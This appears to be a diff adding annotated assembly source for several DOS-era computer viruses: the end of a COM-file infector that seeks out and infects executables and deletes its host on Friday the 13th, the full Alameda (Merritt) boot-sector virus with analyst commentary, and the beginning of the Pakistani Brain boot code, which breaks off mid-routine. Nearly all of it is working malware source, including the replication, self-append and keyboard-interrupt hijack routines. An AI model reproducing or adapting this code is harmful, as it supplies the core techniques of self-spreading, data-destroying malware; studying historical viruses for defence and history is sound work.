+    MOV  DS,AX               ;
+                        ;
+    CALL REPLICATE      ;
+    CALL DO_STUFF       ;DO STUFF HERE
+                        ;
+    JMP  ALL_DONE       ;PASS CONTROL TO HOST
+                        ;
+;-----------------------------------------------------------------------;
+; REPRODUCE                                 ;
+;-----------------------------------------------------------------------;
+REPLICATE:                   ;
+    PUSH ES             ;
+                        ;
+    PUSH DS             ;
+    POP  ES             ;
+                        ;
+    MOV  AH,1AH              ;SET DTA
+    MOV  DX,OFFSET DTA       ;
+    INT  21H            ;
+                        ;
+    MOV  AH,4EH              ;FIND FIRST
+    XOR  CX,CX               ;
+    MOV  DX,OFFSET HOST_TYPE ;
+    INT  21H            ;
+    JC   R_90           ;
+                        ;
+R_10:    CALL ATTACH              ;INFECT FOUND FILE
+                        ;
+    MOV  AH,4FH              ;FIND NEXT
+    INT  21H            ;
+    JNC  R_10           ;UNTIL NO MORE FOUND
+                        ;
+R_90:    POP  AX             ;
+    PUSH AX             ;
+                        ;
+    PUSH DS             ;
+    MOV  DS,AX               ;
+    MOV  AH,1AH              ;RESTORE DTA
+    MOV  DX,0080H       ;
+    INT  21H            ;
+    POP  DS             ;
+                        ;
+    POP  ES             ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;-----------------------------------------------------------------------;
+ATTACH:  PUSH ES             ;IF 'COMMAND.COM' ATTEMPTED...
+    MOV  AX,DS               ;
+    MOV  ES,AX               ;
+    MOV  SI,offset HOST_NAME ;
+    MOV  DI,offset COMMAND_COM    ;
+    MOV  CX,COMMAND_LENGTH   ;
+    CLD                 ;
+    REPE CMPSB               ;
+    POP  ES             ;
+    JNE  A_01           ;
+    JMP  A_99           ;...DONT INFECT IT
+                        ;
+A_01:    MOV  AX,3D02H       ;OPEN R/W
+    MOV  DX,offset HOST_NAME ;ie. '\COMMAND.COM'
+    INT  21H            ;
+    JNC  A_03           ;
+    JMP  A_90           ;
+                        ;
+A_03:    MOV  BX,AX               ;BX=HANDLE
+                        ;
+    PUSH word ptr [HOST_3]   ;SAVE
+    PUSH word ptr [HOST_3+2] ;SAVE
+                        ;
+    MOV  AH,3FH              ;READ FIRST 3 BYTES
+    MOV  CX,3           ;
+    MOV  DX,offset HOST_3    ;
+    INT  21H            ;
+    JC   A_80           ;
+                        ;
+    MOV  AL,[NEW_3]          ;IF ALREADY INFECTED...
+    CMP  [HOST_3],AL         ; (YOU CAN TELL BY THE JUMP INSTRUCTION
+    JNE  A_05           ;  AND BY THE SIZE OF THE JUMP)
+    MOV  AX,[HOST_SIZE]      ;
+    SUB  AX,(offset OUR_END - offset BEGIN)
+    SUB  AX,3           ;
+    CMP  word ptr [HOST_3+1],AX   ;
+    JE   A_85           ;...DONT INFECT AGAIN
+                        ;
+A_05:    MOV  AX,4202H       ;POINT TO THE END
+    XOR  CX,CX               ;
+    XOR  DX,DX               ;
+    INT  21H            ;
+    JC   A_80           ;
+                        ;
+    OR   AX,0FH              ;ROUND UP TO NEXT PARAGRAPH
+    INC  AX             ;
+    SUB  AX,3           ;(TAKE INTO ACOUNT JMP INSTRUCTION SIZ)
+    MOV  [OUR_BEGIN],AX      ;
+                        ;
+    MOV  AX,4200H       ;POINT TO FIRST 3 BYTES
+    XOR  CX,CX               ;
+    XOR  DX,DX               ;
+    INT  21H            ;
+    JC   A_80           ;
+                        ;
+    MOV  AH,40H              ;WRITE NEW 3 BYTES
+    MOV  CX,3           ;
+    MOV  DX,offset NEW_3          ;
+    INT  21H            ;
+    JC   A_80           ;
+                        ;
+;REMEMBER, WERE ALREADY POINTING PAST THE FIRST 3 BYTES!
+    MOV  AX,4201H       ;POINT TO END (ROUNDED UP TO PARA)
+    XOR  CX,CX               ;
+    MOV  DX,[OUR_BEGIN]      ;
+    INT  21H            ;
+    JC   A_80           ;
+                        ;
+    MOV  AH,40H              ;APPEND VIRUS TO END OF FILE
+    MOV  CX,(offset OUR_END - offset BEGIN)
+    MOV  DX,offset BEGIN          ;
+    INT  21H            ;
+    JC   A_80           ;
+                        ;
+    JMP  A_85           ;CLOSE AND RETURN
+                        ;
+A_80:    ;CALL     BEEP           ;
+                        ;
+A_85:    POP  word ptr [HOST_3+2] ;SAVE
+    POP  word ptr [HOST_3]   ;SAVE
+                        ;
+    MOV  AH,3EH              ;CLOSE FILE
+    INT  21H            ;
+                        ;
+A_90:    JNC  A_99           ;
+    ;CALL     BEEP           ;
+A_99:    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+; DO STUFF                                       ;
+;-----------------------------------------------------------------------;
+DO_STUFF:                    ;
+    PUSH ES             ;
+                        ;
+    MOV  AH,2AH              ;GET DATE
+    INT  21H            ;
+                        ;
+    CMP  DL,13               ;IF FRIDAY THE 13th...
+    JNE  DS_90               ;
+    CMP  AL,5           ;
+    JNE  DS_90               ;
+                        ;
+    XOR  AX,AX               ;FIND OUT INFECTED NAME
+    MOV  CX,32767       ;
+    XOR  DI,DI               ;
+    MOV  ES,ES:[002CH]       ;
+    CLD                 ;
+    REPNE     SCASW               ;
+    JNE  DS_90               ;
+    ADD  DI,2           ;SKIP '01 00'
+                        ;
+    PUSH DS             ;DELETE SELF
+    PUSH ES             ;
+    POP  DS             ;
+    MOV  AH,41H              ;
+    MOV  DX,DI               ;
+    INT  21H            ;
+    POP  DS             ;
+                        ;
+DS_90:   POP  ES             ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+; PASS CONTROL TO THE HOST PROGRAM                         ;
+;-----------------------------------------------------------------------;
+ALL_DONE:                    ;
+    MOV  AX,word ptr [HOST_3]     ;RESTORE HOSTS FIRST 3 BYTES
+    MOV  ES:[100H],AX        ;
+    MOV  AL,[HOST_3+2]       ;
+    MOV  ES:[102H],AL        ;
+                        ;
+    POP  DS             ;! NOT ES !
+    POP  BP             ;
+    POP  DI             ;
+    POP  SI             ;
+    POP  DX             ;
+    POP  CX             ;
+    POP  BX             ;
+    POP  AX             ;
+                        ;
+    RETF                ;
+                        ;
+OUR_END  LABEL     BYTE           ;
+                        ;
+CODE     ENDS                ;
+    END  BEGIN               ;
+
+
+
+
+
+********************************************************************
+-----------------------------------------------------------------
+-----------------------------------------------------------------
+********************************************************************
+
+The "Alameda Virus".
+Also Called - Merritt Virus, Yale Virus, Peking Virus, Seoul Virus
+
+
+
+    PAGE 64,132
+;-----------------------------------------------------------------------;
+; This virus is of the "FLOPPY ONLY" variety.                   ;
+; It replicates to the boot sector of a floppy disk and when it gains control
+
+ 
+; it will move itself to upper memory.  It redirects the keyboard      ;
+; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time    ;
+; it will attempt to infect any floppy it finds in drive A:.         ;
+; It keeps the real boot sector at track 39, sector 8, head 0    ;
+; It does not map this sector bad in the fat (unlike the Pakistani Brain)
+; and should that area be used by a file, the virus  ;
+; will die.  It also contains no anti detection mechanisms as does the    ;
+; BRAIN virus.  It apparently uses head 0, sector 8 and not head 1   ;
+; sector 9 because this is common to all floppy formats both single  ;
+; sided and double sided.  It does not contain any malevolent TROJAN ;
+; HORSE code.  It does appear to contain a count of how many times it    ;
+; has infected other diskettes although this is harmless and the count    ;
+; is never accessed.                                 ;
+;                                           ;
+; Things to note about this virus:                         ;
+; It can not only live through an ALT-CTRL-DEL reboot command, but this   ;
+; is its primary (only for that matter) means of reproduction to other    ;
+; floppy diskettes.  The only way to remove it from an infected system    ;
+; is to turn the machine off and reboot an uninfected copy of DOS.   ;
+; It is even resident when no floppy is booted but BASIC is loaded   ;
+; instead.  Then when ALT-CTRL-DEL is pressed from inside of BASIC,  ;
+; it activates and infectes the floppy from which the user is        ;
+; attempting to boot.                                 ;
+;                                           ;
+; Also note that because of the POP CS command to pass control to    ;
+; its self in upper memory, this virus does not to work on 80286     ;
+; machines (because this is not a valid 80286 instruction).          ;
+;                                           ;
+; The Norton utilities can be used to identify infected diskettes by ;
+; looking at the boot sector and the DOS SYS utility can be used to  ;
+; remove it (unlike the Brain).                                     ;
+;-----------------------------------------------------------------------;
+                        ;
+    ORG  7C00H               ;
+                        ;
+TOS LABEL     WORD           ;TOP OF STACK
+;-----------------------------------------------------------------------;
+; 1. Find top of memory and copy ourself up there. (keeping same offset);
+; 2. Save a copy of the first 32 interrupt vectors to top of memory too   ;
+; 3. Redirect int 9 (keyboard) to ourself in top of memory      ;
+; 4. Jump to ourself at top of memory                      ;
+; 5. Load and execute REAL boot sector from track 40, head 0, sector 8    ;
+;-----------------------------------------------------------------------;
+BEGIN:   CLI                 ;INITIALIZE STACK
+    XOR  AX,AX               ;
+    MOV  SS,AX               ;
+    MOV  SP,offset TOS       ;
+    STI                 ;
+                        ;
+    MOV  BX,0040H       ;ES = TOP OF MEMORY - (7C00H+512)
+    MOV  DS,BX               ;
+    MOV  AX,[0013H]          ;
+    MUL  BX             ;
+    SUB  AX,07E0H       ;   (7C00H+512)/16
+    MOV  ES,AX               ;
+                        ;
+    PUSH CS             ;DS = CS
+    POP  DS             ;
+                        ;
+    CMP  DI,3456H       ;IF THE VIRUS IS REBOOTING...
+    JNE  B_10           ;
+    DEC  Word Ptr [COUNTER_1]     ;...LOW&HI:COUNTER_1--
+                        ;
+B_10:    MOV  SI,SP     ;SP=7C00  ;COPY SELF TO TOP OF MEMORY
+    MOV  DI,SI               ;
+    MOV  CX,512              ;
+    CLD                 ;
+    REP  MOVSB               ;
+                        ;
+    MOV  SI,CX     ;CX=0          ;SAVE FIRST 32 INT VETOR ADDRESSES TO
+    MOV  DI,offset BEGIN - 128    ;   128 BYTES BELOW OUR HI CODE
+    MOV  CX,128              ;
+    REP  MOVSB               ;
+                        ;
+    CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEYBOARD)
+                        ;
+    PUSH ES   ;ES=HI         ;JUMP TO OUR HI CODE WITH
+    POP  CS             ;   CS = ES
+                        ;
+    PUSH DS   ;DS=0          ;ES = DS
+    POP  ES             ;
+                        ;
+    MOV  BX,SP     ;SP=7C00  ;LOAD REAL BOOT SECTOR TO 0000:7C00
+    MOV  DX,CX     ;CX=0          ;   DRIVE A: HEAD 0
+    MOV  CX,2708H       ;   TRACK 40, SECTOR 8
+    MOV  AX,0201H       ;   READ SECTOR
+    INT  13H            ;   (common to 8/9 sect. 1/2 sided!)
+    JB   $              ;   HANG IF ERROR
+                        ;
+    JMP  JMP_BOOT       ;JMP 0000:7C00
+                        ;
+;-----------------------------------------------------------------------;
+; SAVE THEN REDIRECT INT 9 VECTOR                     ;
+;                                           ;
+; ON ENTRY:   DS = 0                                  ;
+;        ES = WHERE TO SAVE OLD_09 & (HI)             ;
+;             WHERE NEW_09 IS         (HI)            ;
+;-----------------------------------------------------------------------;
+PUT_NEW_09:                  ;
+    DEC  Word Ptr [0413H]    ;TOP OF MEMORY (0040:0013) -= 1024
+                        ;
+    MOV  SI,9*4              ;COPY INT 9 VECTOR TO
+    MOV  DI,offset OLD_09    ;   OLD_09 (IN OUR HI CODE!)
+    MOV  CX,0004             ;
+                        ;
+    CLI                 ;
+    REP  MOVSB               ;
+    MOV  Word Ptr [9*4],offset NEW_09
+    MOV  [(9*4)+2],ES        ;
+    STI                 ;
+                        ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR                 ;
+;-----------------------------------------------------------------------;
+ACK_KEYBD:                   ;
+    IN   AL,61H              ;RESET KEYBOARD THEN CONTINUE
+    MOV  AH,AL               ;
+    OR   AL,80H              ;
+    OUT  61H,AL              ;
+    XCHG AL,AH               ;
+    OUT  61H,AL              ;
+    JMP  RBOOT               ;
+                        ;
+;-----------------------------------------------------------------------;
+; DATA AREA WHICH IS NOT USED IN THIS VERSION                   ;
+; REASON UNKNOWN                                 ;
+;-----------------------------------------------------------------------;
+TABLE    DB   27H,0,1,2      ;FORMAT INFORMATION FOR TRACK 39
+    DB   27H,0,2,2      ;   (CURRENTLY NOT USED)
+    DB   27H,0,3,2      ;
+    DB   27H,0,4,2      ;
+    DB   27H,0,5,2      ;
+    DB   27H,0,6,2      ;
+    DB   27H,0,7,2      ;
+    DB   27H,0,8,2      ;
+                        ;
+;A7C9A   LABEL     BYTE           ;
+    DW   00024H              ;NOT USED
+    DB   0ADH           ;
+    DB   07CH           ;
+    DB   0A3H           ;
+    DW   00026H              ;
+                        ;
+;L7CA1:                      ;
+    POP  CX             ;NOT USED
+    POP  DI             ;
+    POP  SI             ;
+    POP  ES             ;
+    POP  DS             ;
+    POP  AX             ;
+    POPF                ;
+    JMP  1111:1111      ;
+                        ;
+;-----------------------------------------------------------------------;
+; IF ALT & CTRL & DEL THEN ...                             ;
+; IF ALT & CTRL & ? THEN ...                          ;
+;-----------------------------------------------------------------------;
+NEW_09:  PUSHF                    ;
+    STI                 ;
+                        ;
+    PUSH AX             ;
+    PUSH BX             ;
+    PUSH DS             ;
+                        ;
+    PUSH CS             ;DS=CS
+    POP  DS             ;
+                        ;
+    MOV  BX,[ALT_CTRL]       ;BX=SCAN CODE LAST TIME
+    IN   AL,60H              ;GET SCAN CODE
+    MOV  AH,AL               ;SAVE IN AH
+    AND  AX,887FH       ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
+                        ;
+    CMP  AL,1DH              ;IS IT A [CTRL]...
+    JNE  N09_10              ;...JUMP IF NO
+    MOV  BL,AH               ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
+    JMP  N09_30              ;
+                        ;
+N09_10:  CMP  AL,38H              ;IS IT AN [ALT]...
+    JNE  N09_20              ;...JUMP IF NO
+    MOV  BH,AH               ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
+    JMP  N09_30              ;
+                        ;
+N09_20:  CMP  BX,0808H       ;IF (CTRL DOWN & ALT DOWN)...
+    JNE  N09_30              ;...JUMP IF NO
+                        ;
+    CMP  AL,17H              ;IF [I]...
+    JE   N09_X0              ;...JUMP IF YES
+    CMP  AL,53H              ;IF [DEL]...
+    JE   ACK_KEYBD      ;...JUMP IF YES
+                        ;
+N09_30:  MOV  [ALT_CTRL],BX       ;SAVE SCAN CODE FOR NEXT TIME
+                        ;
+N09_90:  POP  DS             ;
+    POP  BX             ;
+    POP  AX             ;
+    POPF                ;
+                        ;
+    DB   0EAH           ;JMP F000:E987
+OLD_09   DW   ?              ;
+    DW   0F000H              ;
+                        ;
+N09_X0:  JMP  N09_X1              ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+RBOOT:   MOV  DX,03D8H       ;DISABLE COLOR VIDEO !?!?
+    MOV  AX,0800H       ;AL=0, AH=DELAY ARG
+    OUT  DX,AL               ;
+    CALL DELAY               ;
+    MOV  [ALT_CTRL],AX  ;AX=0     ;
+                        ;
+    MOV  AL,3 ;AH=0          ;SELECT 80x25 COLOR
+    INT  10H            ;
+    MOV  AH,2           ;SET CURSOR POS 0,0
+    XOR  DX,DX               ;
+    MOV  BH,DH               ;   PAGE 0
+    INT  10H            ;
+                        ;
+    MOV  AH,1           ;SET CURSOR TYPE
+    MOV  CX,0607H       ;
+    INT  10H            ;
+                        ;
+    MOV  AX,0420H       ;DELAY (AL=20H FOR EOI BELOW)
+    CALL DELAY               ;
+                        ;
+    CLI                 ;
+    OUT  20H,AL              ;SEND EOI TO INT CONTROLLER
+                        ;
+    MOV  ES,CX     ;CX=0 (DELAY)  ;RESTORE FIRST 32 INT VECTORS
+    MOV  DI,CX               ;   (REMOVING OUR INT 09 HANDLER!)
+    MOV  SI,offset BEGIN - 128    ;
+    MOV  CX,128              ;
+    CLD                 ;
+    REP  MOVSB               ;
+                        ;
+    MOV  DS,CX     ;CX=0          ;DS=0
+                        ;
+    MOV  Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
+    MOV  [(19H*4)+2],CS      ;
+                        ;
+    MOV  AX,0040H       ;DS = ROM DATA AREA
+    MOV  DS,AX               ;
+                        ;
+    MOV  [0017H],AH     ;AH=0     ;KBFLAG (SHIFT STATES) = 0
+    INC  Word Ptr [0013H]    ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
+                        ;
+    PUSH DS             ;IF BIOS F000:E502 == 21E4...
+    MOV  AX,0F000H      ;
+    MOV  DS,AX               ;
+    CMP  Word Ptr [0E502H],21E4H  ;
+    POP  DS             ;
+    JE   R_90           ;
+    INT  19H            ;   IF NOT...REBOOT
+                        ;
+R_90:    JMP  0F000:0E502H        ;...DO IT ?!?!?!
+                        ;
+;-----------------------------------------------------------------------;
+; REBOOT INT VECTOR                                   ;
+;-----------------------------------------------------------------------;
+NEW_19:  XOR  AX,AX               ;
+                        ;
+    MOV  DS,AX               ;DS=0
+    MOV  AX,[0410]      ;AX=EQUIP FLAG
+    TEST AL,1           ;IF FLOPPY DRIVES ...
+    JNZ  N19_20              ;...JUMP
+N19_10:  PUSH CS             ;ELSE ES=CS
+    POP  ES             ;
+    CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEYBOARD)
+    INT  18H            ;LOAD BASIC
+                        ;
+N19_20:  MOV  CX,0004             ;RETRY COUNT = 4
+                        ;
+N19_22:  PUSH CX             ;
+    MOV  AH,00               ;RESET DISK
+    INT  13             ;
+    JB   N19_81              ;
+    MOV  AX,0201             ;READ BOOT SECTOR
+    PUSH DS             ;
+    POP  ES             ;
+    MOV  BX,offset BEGIN          ;
+    MOV  CX,1           ;TRACK 0, SECTOR 1
+    INT  13H            ;
+N19_81:  POP  CX             ;
+    JNB  N19_90              ;
+    LOOP N19_22              ;
+    JMP  N19_10              ;IF RETRY EXPIRED...LOAD BASIC
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+N19_90:  CMP  DI,3456             ;IF NOT FLAG SET...
+    JNZ  RE_INFECT      ;...RE INFECT
+                        ;
+JMP_BOOT:                    ;PASS CONTROL TO BOOT SECTOR
+    JMP  0000:7C00H          ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+RE_INFECT:                   ;
+    MOV  SI,offset BEGIN          ;COMPARE BOOT SECTOR JUST LOADED WITH
+    MOV  CX,00E6H       ;   OURSELF
+    MOV  DI,SI               ;
+    PUSH CS             ;
+    POP  ES             ;
+    CLD                 ;
+    REPE CMPSB               ;
+    JE   RI_12               ;IF NOT EQUAL...
+                        ;
+    INC  Word Ptr ES:[COUNTER_1]  ;INC. COUNTER IN OUR CODE (NOT DS!)
+                        ;
+;MAKE SURE TRACK 39, HEAD 0 FORMATTED  ;
+    MOV  BX,offset TABLE          ;FORMAT INFO
+    MOV  DX,0000             ;DRIVE A: HEAD 0
+    MOV  CH,40-1             ;TRACK 39
+    MOV  AH,5           ;FORMAT
+    JMP  RI_10               ;REMOVE THE FORMAT OPTION FOR NOW !
+                        ;
+; <<< NO EXECUTION PATH TO HERE >>>    ;
+    JB   RI_80               ;
+                        ;
+;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
+RI_10:   MOV  ES,DX               ;ES:BX = 0000:7C00, HEAD=0
+    MOV  BX,offset BEGIN          ;TRACK 40H
+    MOV  CL,8           ;SECTOR 8
+    MOV  AX,0301H       ;WRITE 1 SECTOR
+    INT  13H            ;
+                        ;
+    PUSH CS             ;   (ES=CS FOR PUT_NEW_09 BELOW)
+    POP  ES             ;
+    JB   RI_80               ;IF WRITE ERROR...JUMP TO BOOT CODE
+                        ;
+    MOV  CX,0001             ;WRITE INFECTED BOOT SECTOR !
+    MOV  AX,0301             ;
+    INT  13H            ;
+    JB   RI_80               ;   IF ERROR...JUMP TO BOOT CODE
+                        ;
+RI_12:   MOV  DI,3456H       ;SET "JUST INFECTED ANOTHER ONE"...
+    INT  19H            ;...FLAG AND REBOOT
+                        ;
+RI_80:   CALL PUT_NEW_09          ;SAVE/REDIRECT INT 9 (KEYBOARD)
+    DEC  Word Ptr ES:[COUNTER_1]  ;   (DEC. CAUSE DIDNT INFECT)
+    JMP  JMP_BOOT       ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+N09_X1:  MOV  [ALT_CTRL],BX       ;SAVE ALT & CTRL STATUS
+                        ;
+    MOV  AX,[COUNTER_1]      ;PUT COUNTER_1 INTO RESET FLAG
+    MOV  BX,0040H       ;
+    MOV  DS,BX               ;
+    MOV  [0072H],AX          ;   0040:0072 = RESET FLAG
+    JMP  N09_90              ;
+                        ;
+;-----------------------------------------------------------------------;
+; DELAY                                          ;
+;                                           ;
+; ON ENTRY    AH:CX = LOOP COUNT                      ;
+;-----------------------------------------------------------------------;
+DELAY:   SUB  CX,CX               ;
+D_01:    LOOP $              ;
+    SUB  AH,1           ;
+    JNZ  D_01           ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+A7DF4         DB   27H,00H,8,2
+
+COUNTER_1     DW   001CH
+ALT_CTRL DW   0
+
+A7DFC         DB   27H,0,8,2
+
+
+
+
+*********************************************************************
+---------------------------------------------------------------------
+---------------------------------------------------------------------
+*********************************************************************
+
+The "Pakistani Brain"
+
+
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+CODE     SEGMENT PUBLIC 'CODE'         ;
+    ASSUME CS:CODE,DS:CODE,ES:CODE,SS:NOTHING
+                        ;
+         ORG  0         ;
+                        ;
+BPB      EQU  3+8       ;JMP + OEM_NAME
+                        ;
+;-----------------------------------------------------------------------;
+; COPY OF BOOT SECTOR                                 ;
+;-----------------------------------------------------------------------;
+                        ;
+         DB   6 DUP (?) ;
+                        ;
+L0006         DB   ?         ;HEAD
+L0007         DB   ?         ;SECTOR
+L0008         DB   ?         ;TRACK
+                        ;
+L0009         DB   ?         ;HEAD
+L000A         DB   ?         ;SECTOR
+L000B         DB   ?         ;TRACK
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+                        ;
+    ORG  512            ;
+                        ;
+;-----------------------------------------------------------------------;
+; (BOOT SECTOR TYPE FORMAT!)                          ;
+;-----------------------------------------------------------------------;
+CONTINUE:     JMP  CONTINUE_2     ;023C 
+                        ;
+L0203         DB   'IBM X3.2'     ;OEM NAME AND VERSION
+                        ;
+         DW   512       ;BYTES PER SECTOR
+         DB   2         ;SECTORS PER ALLOCATION UNIT
+         DW   1         ;RESERVED SECTORS
+L0210         DB   2         ;NUMBER OF FATS
+         DW   112       ;NUMBER OF ROOT DIR ENTRIES
+         DW   2D0H      ;SECTORS PER DISK
+         DB   0FDH      ;MEDIA ID
+         DW   2         ;SECTORS PER FAT
+         DW   9         ;SECTORS PER TRACK
+         DW   2         ;NUMBER OF HEADS
+         DW   0         ;HIDDEN SECTORS
+                        ;
+;---------------------------------------;
+         DB   0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
+
+         DB   2
+DISK_PARM     DB   0DFH,2,25H,2,12H,2AH,0FFH,50H,0F6H,0,2
+
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+REBOOT:  INT  19H            ;REBOOT
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+CONTINUE_2:                  ;
+    CLI                 ;
+    XOR  AX,AX               ;
+    MOV  ES,AX               ;ES=0
+    MOV  SS,AX               ;SS:SP = 0000:7C00
+    MOV  SP,7C00H       ;
+    MOV  DS,AX               ;
+    MOV  BX,07C0H       ;INITIALIZE DISK POINTER (INT 1E)
+    MOV  Word Ptr [78H],2FH  ;0000:0078 = (DWORD) 07C0:002F
+    MOV  [7AH],BX       ;
+                        ;
+    MOV  DS,BX               ;DS = 07C0
+    MOV  DX,[1EH]       ;GET DRIVE/HEAD          ;BOOT:001E !
+    MOV  [20H],DL       ;SAVE DRIVE         ;BOOT:0020 !
+    INT  13H            ;RESET
+    JNB  C_10           ;
+    JMP  ERROR_2             ;IF ERROR...'BOOT FAILURE'
+                        ;
+C_10:    MOV  SI,BPB              ;SI = BPB      ;BOOT:000B
+    MOV  CX,[SI]             ;CX = BYTES PER SECTOR
+    SHR  CH,1           ;WORDS PER SECTOR
+    XCHG CH,CL               ;
+    MOV  [2BH],CX       ;SAVE               ;BOOT:002B
+    MOV  AL,[SI+5]      ;AL= NUMBER OF FATS ;BOOT:0010
+    XOR  AH,AH               ;
+    MUL  Word Ptr [SI+0BH]   ;TOTAL FAT SECTORS  ;BOOT:0016
+    ADD  AX,[SI+3]      ;+RESERVED SECTORS  ;BOOT:000E
+    ADD  AX,[SI+11H]         ;+HIDDEN SECTORS    ;BOOT:001C
+    MOV  [24H],AX       ;SAVE IT       ;BOOT:0024
+    MOV  BX,7E00H       ;
+    CALL UI             ;
+                        ;
+    MOV  BX,ES               ;SAVE ES
+    MOV  AX,70H              ;ES=0070H
+    MOV  ES,AX               ;
+    MOV  AX,32               ;32*
+    MUL  Word Ptr [SI+6]          ;   ROOT DIR ENTRIES+
+    MOV  CX,[SI]             ;
+    ADD  AX,CX               ;                    BYTES/SECTOR
+    DEC  AX             ;                                -1
+    DIV  CX             ;                         /BYTES/SECTOR
+    ADD  [24H],AX       ;ADD TO BYTES IN BOOT & FAT
+                        ;
+    MOV  CL,[2AH]       ;
+    MOV  AX,[24H]       ;
+    CALL READ_CLUSTER        ;(READ BOOT SECTOR ???)
+                        ;
+    PUSH ES             ;
+    POP  DS             ;
+    JMP  0070H:0000H         ;(PASS CONTROL TO ???)
+                        ;
+;-----------------------------------------------------------------------;
+; HEAVY CRUNCHING HERE (CLUSTER READS ?!?!?!)                   ;
+; ON ENTRY:   AX = ?
+;            ES:BX = DTA                              ;
+;        CL = ?                                  ;
+;        DS:SI = BPB                             ;
+;    DS:[0021] =                                 ;
+;-----------------------------------------------------------------------;
+READ_CLUSTER:                ;02B3
+    PUSH BX             ;
+    PUSH AX             ;
+                        ;
+    MOV  AL,CL               ;
+    MUL  Byte Ptr [2BH]      ;
+    MOV  [29H],AL       ;
+    POP  AX             ;
+    MUL  Word Ptr [2BH]      ;
+    DIV  Word Ptr [SI+0DH]   ;(BPB.SECTORS PER TRACK)
+    INC  DL             ;
+    MOV  [28H],DL       ;
+    PUSH DX             ;
+    XOR  DX,DX               ;
+    DIV  Word Ptr [SI+0FH]   ;(BPB.NUMBER OF HEADS)
+    MOV  [21H],DL       ;
+    MOV  [26H],AX       ;
+    POP  DX             ;
+RC_10:   MOV  CL,[29H]       ;
+    ADD  DL,CL               ;
+    MOV  AX,[SI+0DH]         ;(BPB.SECTORS PER TRACK)
+    INC  AX             ;
+    CMP  DL,AL               ;
+    JBE  RC_20               ;
+    SUB  AL,[28H]       ;
+    MOV  CL,AL               ;
+RC_20:   MOV  AL,CL               ;
+    MOV  DX,[26H]       ;
+    MOV  CL,6           ;
+    SHL  DH,CL               ;
+    OR   DH,[28H]       ;
+    MOV  CX,DX               ;
+    XCHG CH,CL               ;
+    MOV  DX,[20H]       ;
+                        ;
+    MOV  AH,2           ;READ SECTOR
+    PUSH AX             ;
+    INT  13H            ;
+    POP  AX             ;
+    JB   ERROR_2             ;IF ERROR...'BOOT FAILURE'
+    SUB  [29H],AL       ;
+    JBE  RC_90               ;
+    CBW                 ;
+    MUL  Word Ptr [2DH]      ;
+    ADD  BX,AX               ;
+    INC  Byte Ptr [21H]      ;
+    MOV  DL,[21H]       ;
+    CMP  DL,[SI+0FH]         ;
+    MOV  DL,1           ;
+    MOV  [28H],DL       ;
+    JB   RC_10               ;
+    MOV  Byte Ptr [21H],0    ;
+    INC  Word Ptr [26H]      ;
+    JMP  RC_10               ;
+                        ;
+RC_90:   POP  BX             ;
+    RET                 ;
+                        ;
+;-----------------------------------------------------------------------;
+; PRINT BOOT ERROR MESSAGE AND WAIT FOR A KEY                   ;
+;-----------------------------------------------------------------------;
+ERROR_1:                ;0339
+    MOV  SI,01B3H       ;'Non-System disk'
+    JMP  E_10           ;
+                        ;
+;---------------------------------------;
+ERROR_2:                ;
+    MOV  SI,01C5H       ;'BOOT failure'
+E_10:    CALL DISPLAY_STRING      ;
+                        ;
+    MOV  SI,01D4H       ;'Replace and press any key when ready'
+    CALL DISPLAY_STRING      ;
+                        ;
+    MOV  AH,0           ;WAIT FOR A KEY
+    INT  16H            ;
+E_20:    MOV  AH,1           ;   THROW IT AWAY AND
+    INT  16H            ;   WAIT FOR ANOTHER ONE BUT
+    JNZ  E_20           ;   DONT GET IT
+    JMP  REBOOT              ;
+                        ;
+;-----------------------------------------------------------------------;
+; DISPLAY ASCIIZ STRING                               ;
+; ON ENTRY:   DS:SI = ASCIIZ STRING                        ;
+;-----------------------------------------------------------------------;
+DISPLAY_STRING:                   ;0357
+DS_00:   LODSB                    ;DISPLAY UNTIL NULL
+    OR   AL,AL               ;
+    JZ   DS_90               ;
+    MOV  AH,0EH              ;
+    MOV  BX,7           ;
+    INT  10             ;
+    JMP  DS_00               ;
+DS_90:   RET                 ;0365
+                        ;
+;-----------------------------------------------------------------------;
+;                                           ;
+;-----------------------------------------------------------------------;
+UI:                     ;0366:
+    MOV  CL,01               ;
+    CALL READ_CLUSTER        ;
+                        ;
+    PUSH SI             ;
+    MOV  DI,BX               ;
+    MOV  AX,ES:[BX+1C]       ;
+    XOR  DX,DX               ;
+    DIV  Word Ptr [SI]       ;
+    INC  AL             ;
+    MOV  [002A],AL      ;
+    MOV  SI,019D             ;
+    MOV  CX,000B             ;
+    REPZ                ;
+    CMPSB                    ;
+    JNZ  ERROR_1             ;'NON SYSTEM DISK'
+    MOV  AX,ES:[BX+3A]       ;
+    MOV  [0022],AX      ;
+    MOV  DI,BX               ;
+    ADD  DI,+20              ;
+    MOV  SI,01A8             ;
+    MOV  CX,000B             ;
+    REPZ                ;
+    CMPSB                    ;
